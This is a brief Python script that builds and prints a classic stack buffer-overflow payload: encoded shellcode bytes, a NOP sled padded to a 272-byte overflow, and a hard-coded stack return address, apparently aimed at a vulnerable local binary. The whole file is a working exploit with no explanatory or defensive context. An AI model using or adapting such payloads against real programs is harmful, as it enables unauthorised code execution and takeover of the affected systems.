#! /usr/bin/env python

buf = ""
buf += "\xb8\xd0\xb4\x91\x65\xda\xcc\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x0b\x31\x45\x15\x83\xed\xfc\x03\x45\x11\xe2"
buf += "\x25\xde\x9a\x3d\x5c\x4d\xfb\xd5\x73\x11\x8a\xc1\xe3"
buf += "\xfa\xff\x65\xf3\x6c\x2f\x14\x9a\x02\xa6\x3b\x0e\x33"
buf += "\xb0\xbb\xae\xc3\xee\xd9\xc7\xad\xdf\x6e\x7f\x32\x77"
buf += "\xc2\xf6\xd3\xba\x64"

buffer_length = len(buf)  # my most used is 70
overflow_length = 272  # magic number
print("\x90"*(overflow_length - buffer_length) + buf + "\xa0\xd7\xff\xff")
